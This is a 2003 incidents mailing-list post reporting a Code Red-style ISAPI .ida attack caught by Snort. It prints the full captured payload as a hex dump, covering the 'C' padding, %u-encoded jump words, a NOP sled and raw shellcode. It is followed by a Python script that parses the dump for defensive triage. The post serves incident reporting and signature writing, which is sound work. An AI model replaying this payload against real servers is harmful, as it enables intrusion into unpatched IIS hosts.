FYI - different ISAPI .ida exploit

From: Russell Fulton (r.fulton_at_auckland.ac.nz)
Date: 10/19/03

To: incidents@securityfocus.com
Date: Mon, 20 Oct 2003 09:38:11 +1300

    Hi All,
            Snort picked this up today; one host delivered 50 of these to 3 (UNIX
    based ;) web servers in our network. It appears to be a code red style
    exploit but I have not seen one padded with 'C's before.

    BTW I notice that standard code red and nimda exploits are way down
    following the massive patching effort prompted by Blaster. As the
    saying goes "Every cloud has a silver lining" ;)

    Cheers, Russell.

    -- 
    Russell Fulton, Network Security Officer, The University of Auckland,
    New Zealand.
    Generated by ACID v0.9.6b23 on Mon, 20 Oct 2003 08:28:42 +1300
    ------------------------------------------------------------------------------
    #(1 - 135940) [2003-10-20 03:08:31] [cve/CAN-2000-0071] [icat/CAN-2000-0071] [bugtraq/1065] [arachnids/552] [snort/1243]  WEB-IIS ISAPI .ida attempt
    IPv4: 218.108.40.115 -> 202.37.88.21
          hlen=5 TOS=0 dlen=1500 ID=55937 flags=2 offset=0 TTL=108 chksum=2432
    TCP:  port=2601 -> dport: 80  flags=***A**** seq=313304431
          ack=3639528427 off=5 res=0 win=17520 urp=0 chksum=55493
    Payload:  length = 1460
    000 : 47 45 54 20 2F 4E 55 4C 4C 2E 49 44 41 3F 43 43   GET /NULL.IDA?CC
    010 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
    020 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
    030 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
    040 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
    050 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
    060 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
    070 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
    080 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
    090 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
    0a0 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
    0b0 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
    0c0 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
    0d0 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
    0e0 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
    0f0 : 43 43 43 43 43 43 25 75 30 61 65 62 25 75 62 38   CCCCCC%u0aeb%ub8
    100 : 39 30 25 75 64 61 63 66 25 75 37 37 65 65 25 75   90%udacf%u77ee%u
    110 : 30 30 30 30 25 75 30 30 30 30 25 75 38 33 38 62   0000%u0000%u838b
    120 : 25 75 30 30 39 34 25 75 30 30 30 30 25 75 34 30   %u0094%u0000%u40
    130 : 38 62 25 75 30 35 36 34 25 75 30 31 35 30 25 75   8b%u0564%u0150%u
    140 : 30 30 30 30 25 75 65 30 66 66 25 75 39 30 39 30   0000%ue0ff%u9090
    150 : 3D 78 26 90 90 90 90 90 90 90 90 90 90 90 90 90   =x&.............
    160 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
    170 : 90 90 90 EB 09 90 90 90 5F EB 08 90 90 90 E8 F5   ........_.......
    180 : FF FF FF 8D 6F F0 8D 7D 2D 90 90 90 8B F7 66 B8   ....o..}-.....f.
    190 : 48 06 33 C9 66 8B C8 B4 99 FC AC 32 C4 AA E2 FA   H.3.f......2....
    1a0 : 14 24 EC 9F 99 99 65 AA 50 28 B9 29 BD 6B 37 5F   .$....e.P(.).k7_
    1b0 : DE 66 99 71 94 9D 99 99 71 16 9D 99 99 71 D7 9B   .f.q....q....q..
    1c0 : 99 99 10 1C DA 9C 99 99 71 C8 9B 99 99 71 BD 9A   ........q....q..
    1d0 : 99 99 10 1C DE 9C 99 99 71 27 98 99 99 10 1C D6   ........q'......
    1e0 : 9C 99 99 12 1C DE 9C 99 99 71 E6 9B 99 99 10 1C   .........q......
    1f0 : D2 9C 99 99 71 C7 99 99 99 71 08 99 99 99 1A 61   ....q....q.....a
    200 : 99 ED 79 12 1C D2 9C 99 99 C9 66 0C 94 9F 99 99   ..y.......f.....
    210 : 12 1C DE 9C 99 99 C9 66 0C 94 9F 99 99 12 1C B6   .......f........
    220 : 9C 99 99 C9 66 0C 1F 9C 99 99 12 1C A2 9C 99 99   ....f...........
    230 : C9 66 0C 1F 9C 99 99 21 99 99 99 99 C9 12 1C D6   .f.....!........
    240 : 9C 99 99 C9 66 0C 5C 9C 99 99 21 99 99 99 99 C9   ....f.\...!.....
    250 : 66 0C 4F 9C 99 99 5A 12 1C D2 9C 99 99 F3 99 F3   f.O...Z.........
    260 : 80 14 1C 9A 98 99 99 C9 12 1C D2 9C 99 99 C9 66   ...............f
    270 : 0C 9A 9F 99 99 5A 94 93 CE F0 F7 F7 ED D8 EC ED   .....Z..........
    280 : F6 D8 ED ED F8 FA F2 B9 CF AB A9 94 93 94 93 F1   ................
    290 : 09 99 99 99 66 0C 26 9C 99 99 12 1C B6 9C 99 99   ....f.&.........
    2a0 : 71 5F 99 99 99 1A 61 66 96 1D 2F 99 99 99 1A 61   q_....af../....a
    2b0 : 99 ED CE 09 09 09 09 F3 99 14 1C A6 9C 99 99 C9   ................
    2c0 : F1 99 9D 99 99 12 1C DA 9C 99 99 C9 12 1C B6 9C   ................
    2d0 : 99 99 C9 66 0C 2F 9C 99 99 1A 61 99 96 1D 1B 99   ...f./....a.....
    2e0 : 99 99 F3 99 12 1C A6 9C 99 99 C9 12 1C DA 9C 99   ................
    2f0 : 99 C9 12 1C D2 9C 99 99 C9 66 0C 9A 9F 99 99 1A   .........f......
    300 : 61 66 ED FD 09 09 09 09 72 1C F3 99 F1 99 9D 99   af......r.......
    310 : 99 12 1C DA 9C 99 99 C9 12 1C D2 9C 99 99 C9 66   ...............f
    320 : 0C 91 9F 99 99 1A 61 99 ED A7 09 09 09 09 1A 61   ......a........a
    330 : 66 ED AC 09 09 09 09 AA 42 CA 14 04 A6 9C 99 99   f.......B.......
    340 : CA C9 12 1C DA 9C 99 99 C9 12 1C A2 9C 99 99 C9   ................
    350 : 66 0C 35 9C 99 99 1A 61 99 ED 90 09 09 09 09 70   f.5....a.......p
    360 : B2 66 66 66 AA 59 D1 5A AA 59 5A AA 42 CA 14 04   .fff.Y.Z.YZ.B...
    370 : BD 9B 99 99 CA AA 42 CA CA CA C9 66 0C 0B 9C 99   ......B....f....
    380 : 99 1A 61 99 ED 92 09 09 09 09 12 1C BD 9B 99 99   ..a.............
    390 : 5A 21 66 66 66 66 5A 99 99 99 99 12 1C DA 9C 99   Z!ffffZ.........
    3a0 : 99 5E 99 DD 99 99 99 C9 66 0C FE 9C 99 99 12 04   .^......f.......
    3b0 : DA 9C 99 99 12 1C AA 9C 99 99 10 DA D9 10 DA A5   ................
    3c0 : 12 1C AE 9C 99 99 10 DA A1 21 98 98 99 99 10 DA   .........!......
    3d0 : B5 CA CA AA 59 C9 C9 C9 D9 C9 D1 C9 C9 14 1C EC   ....Y...........
    3e0 : 9F 99 99 C9 AA 59 C9 66 0C EE 9C 99 99 12 1C AA   .....Y.f........
    3f0 : 9C 99 99 C9 66 0C 1F 9C 99 99 12 1C AE 9C 99 99   ....f...........
    400 : C9 66 0C 1F 9C 99 99 12 1C DA 9C 99 99 12 99 5A   .f.............Z
    410 : F1 99 9D 99 99 F3 D9 66 0C 39 9C 99 99 5A AA 59   .......f.9...Z.Y
    420 : C9 14 1C 77 9B 99 99 5E 99 95 99 99 99 C9 14 1C   ...w...^........
    430 : AA 9C 99 99 C9 14 1C B6 9C 99 99 C9 66 0C C5 9C   ............f...
    440 : 99 99 AA 59 C9 14 1C 77 9B 99 99 C9 14 1C A2 9C   ...Y...w........
    450 : 99 99 C9 14 1C AE 9C 99 99 C9 66 0C C5 9C 99 99   ..........f.....
    460 : 5A 99 99 99 99 99 99 99 99 98 99 99 99 C9 14 04   Z...............
    470 : B8 9A 99 99 5E 9A 89 99 99 99 CA 14 04 DB 9D 99   ....^...........
    480 : 99 CA C9 66 0C 65 9C 99 99 12 41 1A 61 99 C1 E5   ...f.e....A.a...
    490 : 45 12 5A 5A 89 99 99 99 F3 8A 14 1C F6 9A 99 99   E.ZZ............
    4a0 : C9 66 0C BD 9F 99 99 14 1C F6 9A 99 99 C9 66 0C   .f............f.
    4b0 : A9 9F 99 99 1A 61 99 ED BB 09 09 09 09 12 E9 95   .....a..........
    4c0 : 12 67 65 34 1A 61 99 ED 8A 09 09 09 09 12 99 A5   .ge4.a..........
    4d0 : 93 ED 69 A5 59 ED 75 A5 35 ED 71 5A 12 6E 34 12   ..i.Y.u.5.qZ.n4.
    4e0 : 99 5A 99 99 99 99 99 99 99 99 99 99 99 99 99 99   .Z..............
    4f0 : 99 99 99 99 99 99 12 1C DA 9C 99 99 C9 F3 9B 66   ...............f
    500 : 0C 80 9F 99 99 F3 99 F3 98 F3 9B 66 0C 70 9C 99   ...........f.p..
    510 : 99 1A 61 66 96 1D 01 99 99 99 10 1C DE 9C 99 99   ..af............
    520 : 14 04 A6 9C 99 99 5E 9A 98 99 99 99 F3 9D CA F3   ......^.........
    530 : 9D F1 66 66 99 99 C9 66 0C A7 9F 99 99 1A 61 99   ..ff...f......a.
    540 : EC E9 09 09 09 09 FF 12 1C F6 9F 99 99 FF 10 1C   ................
    550 : DD 9D 99 99 12 1C E8 9F 99 99 10 1C DF 9D 99 99   ................
    560 : 1A 61 66 EC 96 09 09 09 09 71 B3 66 66 66 10 1C   .af......q.fff..
    570 : DF 9D 99 99 12 1C DE 9C 99 99 F3 89 14 04 DB 9D   ................
    580 : 99 99 CA C9 66 0C 69 9C 99 99 1A 61 99 EC BA 09   ....f.i....a....
    590 : 09 09 09 F3 9C 12 1C DE 9C 99 99 C9 66 0C 6C 9C   ............f.l.
    5a0 : 99 99 1A 61 99 EC 92 09 09 09 09 12 1C DE 9C 99   ...a............
    5b0 : 99 5A AA 59                                       .Z.Y
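The ACID dump above is the raw evidence, and the triage questions a defender asks of it are the ones Russell raises: is it really a .ida request, how long is the padding run and what character is it, and how much %u-encoded data follows. The script below is an added example, not code from the post, from ACID or from Snort: it parses ACID's hex-dump format back into bytes and summarises the request line. The function and field names are my own; the embedded dump is the first 22 lines of the alert quoted above (offsets 000 to 150), which cover the whole HTTP request line, and the raw bytes that follow it in the post are not needed for this.

```python
"""Rebuild the payload from an ACID hex dump and summarise the .ida request.

Added example (not from the post, ACID or Snort). Function and field names
are this example's own; the embedded dump is the 000-150 excerpt of the
alert in the post, which covers the HTTP request line.
"""
import re

# Excerpt of the ACID payload dump quoted in the post (offsets 000-150).
ACID_DUMP = """\
000 : 47 45 54 20 2F 4E 55 4C 4C 2E 49 44 41 3F 43 43   GET /NULL.IDA?CC
010 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
020 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
030 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
040 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
050 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
060 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
070 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
080 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
090 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
0a0 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
0b0 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
0c0 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
0d0 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
0e0 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
0f0 : 43 43 43 43 43 43 25 75 30 61 65 62 25 75 62 38   CCCCCC%u0aeb%ub8
100 : 39 30 25 75 64 61 63 66 25 75 37 37 65 65 25 75   90%udacf%u77ee%u
110 : 30 30 30 30 25 75 30 30 30 30 25 75 38 33 38 62   0000%u0000%u838b
120 : 25 75 30 30 39 34 25 75 30 30 30 30 25 75 34 30   %u0094%u0000%u40
130 : 38 62 25 75 30 35 36 34 25 75 30 31 35 30 25 75   8b%u0564%u0150%u
140 : 30 30 30 30 25 75 65 30 66 66 25 75 39 30 39 30   0000%ue0ff%u9090
150 : 3D 78 26 90 90 90 90 90 90 90 90 90 90 90 90 90   =x&.............
"""

# ACID prints "<offset> : <16 hex pairs, 47 chars wide>   <ascii>"; reading
# the fixed-width hex column means the ASCII column is never misparsed.
LINE_RE = re.compile(r"^\s*[0-9a-f]+\s*:\s(.{0,47})", re.IGNORECASE)

# Bytes that may appear in a request-line URI (visible ASCII, no whitespace).
URI_BYTES = frozenset(range(0x21, 0x7F))


def parse_acid_dump(text: str) -> bytes:
    """Rebuild the payload bytes from an ACID/Snort hex dump."""
    out = bytearray()
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            out += bytes.fromhex(m.group(1))  # fromhex skips the spaces
    return bytes(out)


def summarise_request(payload: bytes) -> dict:
    """Extract the triage facts: method, path, padding run, %u data, trailer."""
    method, _, rest = payload.partition(b" ")
    # The URI ends at the first space or non-printable byte: normally the
    # space before "HTTP/1.x", in this capture the first raw 0x90 after "=x&".
    uri_len = 0
    while uri_len < len(rest) and rest[uri_len] in URI_BYTES:
        uri_len += 1
    uri = rest[:uri_len].decode("ascii")
    path, _, query = uri.partition("?")

    # Longest run of one repeated character: the 'C' padding Russell noticed
    # (Code Red variants used 'N' and 'X' in the same position).
    pad_char, pad_len = "", 0
    for run in re.finditer(r"(.)\1*", query):
        if len(run.group(0)) > pad_len:
            pad_char, pad_len = run.group(1), len(run.group(0))

    # %uXXXX tokens: IIS decodes each one as a 16-bit code unit, so every
    # token contributes two raw bytes.  They are only counted here.
    words = re.findall(r"%u([0-9a-fA-F]{4})", query)
    u_decoded = b"".join(int(w, 16).to_bytes(2, "little") for w in words)

    trailer = rest[uri_len:]  # bytes after the request line
    return {
        "method": method.decode("ascii", "replace"),
        "path": path,
        "ida_request": path.lower().endswith(".ida"),
        "query_len": len(query),
        "pad_char": pad_char,
        "pad_len": pad_len,
        "u_tokens": len(words),
        "u_decoded_len": len(u_decoded),
        "trailer_len": len(trailer),
        "trailer_nops": trailer.count(0x90),  # 0x90 filler after the URI
    }


if __name__ == "__main__":
    for key, value in summarise_request(parse_acid_dump(ACID_DUMP)).items():
        print(f"{key:>14}: {value}")
```

Pasting the whole alert into `ACID_DUMP` instead of the excerpt changes only `trailer_len` and `trailer_nops`, which then cover the full 1460-byte payload. The summary (232 bytes of 'C', fifteen %u tokens, a .ida path) is what you would compare across the 50 hits Russell saw to confirm they are one tool rather than several, and the padding length and character are the fields worth recording when writing a local signature narrower than the generic `WEB-IIS ISAPI .ida attempt` rule.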
